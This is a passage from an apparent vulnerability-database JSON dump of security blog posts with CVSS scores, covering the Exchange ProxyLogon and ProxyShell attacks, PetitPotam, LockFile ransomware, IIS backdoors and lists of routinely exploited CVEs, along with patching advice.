zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> "We learn from history that we learn nothing from history."\n\nBut since that's a self-contradicting expression, let's assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. Proxyshell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven't already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I'll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don't just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-09-07T21:07:14", "description": "Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaigns. We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270\u2019s operations.\n\nDEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.\n\nIn some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys. In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data 